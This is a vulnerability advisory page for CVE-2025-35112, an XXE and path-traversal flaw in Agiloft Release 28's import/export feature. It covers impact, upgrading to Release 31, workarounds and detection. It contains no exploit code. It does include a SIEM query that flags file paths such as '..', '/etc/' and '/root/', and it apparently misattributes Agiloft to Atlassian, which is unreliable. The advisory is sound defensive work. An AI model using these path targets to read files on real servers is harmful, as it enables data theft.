CVE-2025-35112 – Agiloft Release 28 contains an XML External Ent... (How to Fix)

Q: What is the severity of CVE-2025-35112?

CVE-2025-35112 has a CVSS score of 4.1 (MEDIUM). Agiloft Release 28 contains an XML External Entities (XXE) vulnerability in import/export functionality that allows authenticated attackers to perform path traversal and read local system files. This affects all Agiloft installations running Release 28 with import/export enabled on any table. Only authenticated users can exploit this vulnerability.

📋 TL;DR

Agiloft Release 28 contains an XML External Entities (XXE) vulnerability in import/export functionality that allows authenticated attackers to perform path traversal and read local system files. This affects all Agiloft installations running Release 28 with import/export enabled on any table. Only authenticated users can exploit this vulnerability.

💻 Affected Systems

Products:

Agiloft

Versions: Release 28

Operating Systems: All platforms running Agiloft

Default Config Vulnerable: ⚠️ Yes

Notes: Vulnerability exists in any table that has import/export functionality enabled. The vulnerability is present by default in affected versions.

📦 What is this software?

Agiloft by Atlassian

View all CVEs affecting Agiloft →

⚠️ Risk & Real-World Impact

🔴

Worst Case

An authenticated malicious insider could read sensitive system files, configuration files, or potentially access credentials stored on the server filesystem.

🟠

Likely Case

Authenticated users with import/export permissions could read arbitrary files from the server filesystem, potentially exposing configuration data or other sensitive information.

🟢

If Mitigated

With proper access controls and monitoring, impact is limited to authorized users who already have access to sensitive data.

🌐 Internet-Facing: MEDIUM - While authentication is required, internet-facing instances could be targeted by attackers who have obtained valid credentials.

🏢 Internal Only: MEDIUM - Internal users with import/export permissions could exploit this for unauthorized file access.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: MEDIUM

Exploitation requires authenticated access and knowledge of the import/export functionality. Attackers need to craft malicious XML files with external entity references.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Agiloft Release 31

Vendor Advisory: https://wiki.agiloft.com/display/HELP/What%27s+New%3A+CVE+Resolution

Restart Required: No

Instructions:

1. Backup your Agiloft instance. 2. Upgrade to Agiloft Release 31 following vendor upgrade procedures. 3. Verify the upgrade completed successfully. 4. Test import/export functionality.

🔧 Temporary Workarounds

Disable Import/Export Functionality

all

Temporarily disable import/export functionality on all tables until patching can be completed.

Navigate to Table Settings > Permissions > Disable 'Import/Export' for all user roles

Restrict XML Processing

all

Configure XML parser to disable external entity processing if possible in your environment.

🧯 If You Can't Patch

Implement strict access controls to limit import/export permissions to only essential users
Monitor import/export activity logs for suspicious file access patterns

🔍 How to Verify

Check if Vulnerable:

Check Agiloft version in admin interface. If version is Release 28, the system is vulnerable.

Check Version:

Check Agiloft admin dashboard or use vendor-specific version check command for your installation.

Verify Fix Applied:

After upgrading to Release 31, verify version in admin interface and test import/export functionality with safe files.

📡 Detection & Monitoring

Log Indicators:

Unusual import activity patterns
Multiple failed import attempts
Import operations accessing unusual file paths

Network Indicators:

Large XML file uploads to import endpoints
Unusual outbound connections during import operations

SIEM Query:

source="agiloft" AND (event="import" OR event="export") AND (file_path CONTAINS ".." OR file_path CONTAINS "/etc/" OR file_path CONTAINS "/root/")

📊 Metadata

CVE ID: CVE-2025-35112

CVSS v3 Score: 4.1 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N

CWE: CWE-611

EPSS Score: 0.04% exploit probability (12.9th percentile)

Published: August 26, 2025

Last Updated: September 2, 2025

🔗 References

https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-239-01.json Third Party Advisory
https://wiki.agiloft.com/display/HELP/What%27s+New%3A+CVE+Resolution Release Notes,Vendor Advisory
https://www.cve.org/CVERecord?id=CVE-2025-35112 Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-35112, you might also want to check these: